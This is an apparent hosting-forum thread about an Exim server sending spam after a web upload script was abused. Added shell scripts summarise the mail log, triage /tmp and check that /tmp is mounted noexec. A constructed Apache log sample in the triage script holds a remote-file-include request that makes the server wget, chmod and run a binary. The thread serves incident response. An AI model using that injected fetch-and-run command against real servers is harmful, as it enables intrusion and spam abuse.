Server spewing TONS of mail

keefe007

One of my DA servers seems to be spewing a crap-load of mail today. Perhaps someone is trying some sort of attack or the server got infected with something.

Right now I have about 40-50 exim processes going.

Here's what the mainlog says:

Code:
2005-11-06 02:53:11 1EYgGk-0004Ro-EO => apache <[email protected]> F=<> R=localuser T=local_delivery S=5050
2005-11-06 02:53:11 1EYgGy-0004V2-TJ <= [email protected] U=apache P=local S=2745 T="Estou com Saudades de voc\352!!!" from <[email protected]> for [email protected]
2005-11-06 02:53:11 1EYgGy-0004V0-Jo <= [email protected] U=apache P=local S=5602 T="Eu te Amo!!! \266\330\277?\277" from <[email protected]> for [email protected]
2005-11-06 02:53:12 1EYgGw-0004Uh-5s Completed
2005-11-06 02:53:12 1EYgGw-0004Uk-AA ** [email protected] F=<[email protected]>: Unrouteable address
2005-11-06 02:53:12 1EYgH0-0004VB-0m <= <> R=1EYgGt-0004UC-2Z U=mail P=local S=6313 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2005-11-06 02:53:12 1EYgGx-0004Ux-G5 ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: retry time not reached for any host after a long failure period
2005-11-06 02:53:12 1EYgH0-0004VE-4O <= [email protected] U=apache P=local S=5615 T="Te amooo" from <[email protected]> for [email protected]
2005-11-06 02:53:12 1EYgGk-0004Ro-EO Completed
2005-11-06 02:53:12 1EYgGt-0004UE-3D ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<[email protected]>: host mx.br.inter.net [200.142.77.19]: 550 unknown user
2005-11-06 02:53:12 1EYgGv-0004UZ-Er == [email protected] R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:<[email protected]>: host mx.uol.com.br [200.221.4.129]: 450 Client host rejected: cannot find your hostname, [64.242.222.170]
2005-11-06 02:53:12 1EYgH0-0004VI-BI <= <> R=1EYgGu-0004US-Cr U=mail P=local S=11062 T="Mail delivery failed: returning message to sender" from <> for [email protected]

Anyone know wtf is going on here?
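Added example, not part of the thread: a small script that summarises an Exim mainlog the way a responder reads the lines above. Exim tags messages it accepted from a local process with U=<unix user> and P=local; mail that arrived over SMTP carries H=... and P=smtp/esmtp/esmtpa instead, and bounces Exim generates itself show up as "<= <>" with U=mail. So counting "<=" lines per U=/P= pair tells you at once whether a web script (U=apache) is the injector. The sample log is constructed to mirror the posted lines, with the addresses replaced by example.* names, and the field positions assume Exim's default mainlog layout without a timezone column.

```shell
#!/bin/sh
# Added example (not from the thread): who is injecting mail into Exim?
# Reads a mainlog (or the constructed sample below) and counts message
# arrivals per submitting user/protocol, per envelope sender, and bounces.

# Write a constructed sample mainlog to the file named in $1. Addresses,
# hosts and IPs are made up; the line shapes mirror the ones posted.
write_sample_mainlog() {
  cat >"$1" <<'EOF'
2005-11-06 02:53:11 1EYgGy-0004V2-TJ <= spammer@example.com U=apache P=local S=2745 T="Estou com Saudades de voce!!!" from <spammer@example.com> for victim1@example.net
2005-11-06 02:53:11 1EYgGy-0004V0-Jo <= spammer@example.com U=apache P=local S=5602 T="Eu te Amo!!!" from <spammer@example.com> for victim2@example.net
2005-11-06 02:53:12 1EYgGw-0004Uh-5s Completed
2005-11-06 02:53:12 1EYgH0-0004VB-0m <= <> R=1EYgGt-0004UC-2Z U=mail P=local S=6313 T="Mail delivery failed: returning message to sender" from <> for spammer@example.com
2005-11-06 02:53:12 1EYgH0-0004VE-4O <= spammer@example.com U=apache P=local S=5615 T="Te amooo" from <spammer@example.com> for victim3@example.net
2005-11-06 02:53:12 1EYgGt-0004UE-3D ** victim4@example.net F=<spammer@example.com> R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<victim4@example.net>: host mx.example.net [192.0.2.25]: 550 unknown user
2005-11-06 02:53:13 1EYgH1-0004VJ-Aa <= alice@example.org H=(client.example.org) [198.51.100.10] P=esmtpa A=login:alice S=1200 T="hello" from <alice@example.org> for bob@example.net
EOF
}

# Count message arrivals ("<=" lines) per submitting user and protocol.
# "U=-" means the line has no U= field, i.e. the message came in over
# SMTP rather than from a local process. Scanning stops at T= because the
# subject after it may contain spaces.
count_injectors() {
  awk '$4 == "<=" {
         u = "U=-"; p = "P=-"
         for (i = 5; i <= NF; i++) {
           if ($i ~ /^T=/) break
           if ($i ~ /^U=/) u = $i
           if ($i ~ /^P=/) p = $i
         }
         n[u " " p]++
       }
       END { for (k in n) print n[k], k }' "$1" | sort -rn
}

# Count arrivals per envelope sender: shows the forged From the script uses.
top_senders() {
  awk '$4 == "<=" { n[$5]++ } END { for (k in n) print n[k], k }' "$1" | sort -rn
}

# Bounces Exim generated locally ("<= <>"). Every undeliverable spam makes
# one more queued message, which is why the exim process count balloons.
count_bounces() {
  grep -c '^[^ ]* [^ ]* [^ ]* <= <> ' "$1"
}

# Stand-alone: "sh exim-injectors.sh /var/log/exim/mainlog", or no argument
# to run over the constructed sample.
if [ -n "$1" ]; then
  log=$1
else
  log=$(mktemp); write_sample_mainlog "$log"
fi
echo "== arrivals by submitting user/protocol"; count_injectors "$log"
echo "== arrivals by envelope sender";          top_senders "$log"
echo "== locally generated bounces: $(count_bounces "$log")"
[ -n "$1" ] || rm -f "$log"
```

On the sample, the first table comes out as "3 U=apache P=local" on top: three messages handed to Exim by a process running as the web server user, which is exactly the signature of a PHP/CGI mailer or a dropped binary rather than an open relay. Bounces from the same run then pile up on top of the original spam.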
 
I would say someone uploaded a script to send Spam.

Check your /tmp for strange files

# ls -la /tmp

should also display hidden directories

If you find something suspicious, check to see if it's loaded in memory...

# ps aux | grep <what you found>

Kill the process and remove it from /tmp

Check to see if the email is still being sent; if not, you've probably found the culprit. Now you need to find the offending website... Look through all the apache logs for <what you found>; this site probably has an unsafe file-upload script.

Make sure you mount /tmp in noexec mode to prevent this in the future...
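Added example, not part of the thread: the triage steps in the reply above (look in /tmp including hidden directories, see what is running from there, then search the web logs for the file name) packaged as shell functions. It runs against a constructed sandbox directory and a constructed Apache access log so it can be tried on a clean box; the file name "r0nin", the hidden directory ".x", the vhost paths and the log lines are all made up for the demo. The process check reads Linux /proc and assumes that layout.

```shell
#!/bin/sh
# Added example (not from the thread): /tmp triage after a web-user
# compromise. Everything named below (r0nin, .x, gallery paths) is made up.

# Build a fake /tmp under $1: a normal hidden dir, an attacker-made hidden
# dir holding an executable dropper, an executable script, and plain data.
make_sandbox() {
  mkdir -p "$1/.ICE-unix" "$1/.x"
  printf '#!/bin/sh\nexit 0\n' >"$1/.x/r0nin"; chmod 755 "$1/.x/r0nin"
  printf '#!/bin/sh\nexit 0\n' >"$1/dc.pl";    chmod 755 "$1/dc.pl"
  printf 'session data\n'      >"$1/sess_abc"   # mode 644: not executable
}

# Every regular file with any execute bit set anywhere under $1, hidden
# dirs included. "ls -la" shows one level only; find descends. The three
# -perm tests are POSIX; "-perm /111" would be GNU-only.
find_executables() {
  find "$1" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) -print \
    | LC_ALL=C sort
}

# Running processes whose executable or cwd lives under $1 (Linux /proc).
# /proc/PID/exe still resolves after the file is deleted (readlink shows
# " (deleted)"), so this also finds droppers unlinked after launch, which
# "ls /tmp" would never show. Output: "PID exe".
procs_under() {
  dir=$1
  for p in /proc/[0-9]*; do
    exe=$(readlink "$p/exe" 2>/dev/null) || continue
    cwd=$(readlink "$p/cwd" 2>/dev/null || true)
    for x in "$exe" "$cwd"; do
      case "$x/" in "$dir"/*) echo "${p#/proc/} $exe"; break ;; esac
    done
  done
}

# Write a constructed Apache access log to $1. The second line is the kind
# of injected command (fetch, chmod, run) that leads back to the vulnerable
# script; the first is ordinary traffic.
write_sample_access_log() {
  cat >"$1" <<'EOF'
198.51.100.7 - - [04/Nov/2005:22:09:40 -0500] "POST /gallery/upload.php HTTP/1.1" 200 211 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Nov/2005:22:10:05 -0500] "GET /gallery/view.php?img=http://203.0.113.9/x.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.9/r0nin;chmod%20755%20r0nin;./r0nin HTTP/1.1" 200 512 "-" "Mozilla/4.0"
EOF
}

# Search the given access logs for the dropped file's name; the matching
# request names the vhost and script to fix. $1 = name, rest = log files.
grep_weblogs() {
  name=$1; shift
  grep -F -- "$name" "$@" || true
}

# Stand-alone: "sh tmp-triage.sh /tmp" runs the first two checks against a
# real directory; with no argument it uses the sandbox and cleans up.
if [ -n "$1" ]; then
  echo "== executables under $1";      find_executables "$1"
  echo "== processes running from $1"; procs_under "$1"
else
  sb=$(mktemp -d); make_sandbox "$sb"
  alog=$(mktemp);  write_sample_access_log "$alog"
  echo "== executables under sandbox $sb"; find_executables "$sb"
  echo "== access-log hits for r0nin";     grep_weblogs r0nin "$alog"
  rm -rf "$sb" "$alog"
fi
```

The PIDs from `procs_under` are what you hand to `kill -9`; run it again afterwards to confirm nothing respawned, since the web script that dropped the binary is still reachable until the access-log hit is traced to its vhost and that script is fixed or removed.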
 
I think I found the offender.

Code:
apache   17107  0.0  0.0   1444   304 ?        Ss   Oct21   0:00 ./r0nin
apache    7577  0.0  0.0   1444   348 ?        R    Nov04   0:03 ./r0nin
apache   17619  0.0  0.0   1444   348 ?        R    Nov04   0:02 ./r0nin
apache   14554  0.0  0.0   1444   348 ?        S    Nov04   0:01 ./r0nin
apache   12781  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   31294  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   32188  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   13659  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   31141  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
root     27838  0.0  0.0   1824   608 pts/2    R+   03:10   0:00 grep r0nin
seraph:/tmp#

Only problem is that the processes don't seem to go away once I kill them. Any ideas?
 
Try

# kill -9 <process id> ..... <process id>

You can enter all process IDs on a single line as long as you have a space in between.
 
Alright I seem to have them all gone and the r0nin files in /tmp have been deleted.

I do see something suspicious though...One user has about 200 IMAPD connections open right now. What could be causing that?
 
And to keep from having it happen again, make sure your /tmp directory is on its own partition, and marked noexec.

You can find some information searching for "noexec" (without the quotes) on these forums.

Yes, we can do it, but as I've said before, we're expensive.

:cool:

Jeff
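Added example, not part of the thread: a check for the advice above. It reads a /proc/mounts-style file, reports which of noexec, nosuid and nodev a given mount point lacks (or that it is not a separate mount at all), and prints the fstab entry that adds them. The sample mounts file and the device names in it are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): is /tmp its own filesystem, and is
# it mounted noexec,nosuid,nodev? Devices and paths below are made up.

HARDEN_OPTS="noexec nosuid nodev"

# Constructed /proc/mounts: /tmp is its own filesystem but mounted plain rw,
# /var/tmp is already hardened, /home is not a mount point at all.
write_sample_mounts() {
  cat >"$1" <<'EOF'
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
/dev/sda3 /tmp ext3 rw 0 0
/dev/sda4 /var/tmp ext3 rw,noexec,nosuid,nodev 0 0
EOF
}

# Print each hardening option that mount point $2 lacks, per mounts file $1.
# No output: fully hardened. "NOTMOUNTED": $2 is not a mount point, so it
# inherits the parent filesystem's options, and noexec on / is not an option.
missing_opts() {
  line=$(awk -v mp="$2" '$2 == mp { print; exit }' "$1")
  if [ -z "$line" ]; then echo NOTMOUNTED; return 1; fi
  opts=$(printf '%s\n' "$line" | awk '{ print $4 }')
  for o in $HARDEN_OPTS; do
    case ",$opts," in *",$o,"*) ;; *) echo "$o" ;; esac
  done
}

# The fstab line for device $1 at mount point $2 with the options added.
# Applying it needs root: edit /etc/fstab, then
#   mount -o remount,noexec,nosuid,nodev /tmp
hardened_fstab_line() {
  echo "$1 $2 ext3 defaults,noexec,nosuid,nodev 0 2"
}

# Stand-alone: "sh tmpmount.sh /tmp" checks the live /proc/mounts; with no
# argument it reports on the constructed sample.
if [ -n "$1" ]; then
  m=/proc/mounts; mp=$1
else
  m=$(mktemp); write_sample_mounts "$m"; mp=/tmp
fi
miss=$(missing_opts "$m" "$mp" | tr '\n' ' ')
echo "$mp is missing: ${miss:-nothing}"
[ -n "$1" ] || { echo "fix: $(hardened_fstab_line /dev/sda3 /tmp)"; rm -f "$m"; }
```

Two caveats worth knowing before relying on this. noexec stops `./r0nin` style direct execution of a file on that filesystem, but `perl /tmp/x.pl` or `sh /tmp/x.sh` still runs, because the interpreter is what gets executed; it raises the bar for dropped binaries rather than closing the hole in the upload script. And /var/tmp and /dev/shm are writable by the web user for the same reasons, so they want the same options. If there is no spare partition, a file-backed loopback filesystem mounted with `-o loop,noexec,nosuid,nodev` on /tmp gives the same result.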
 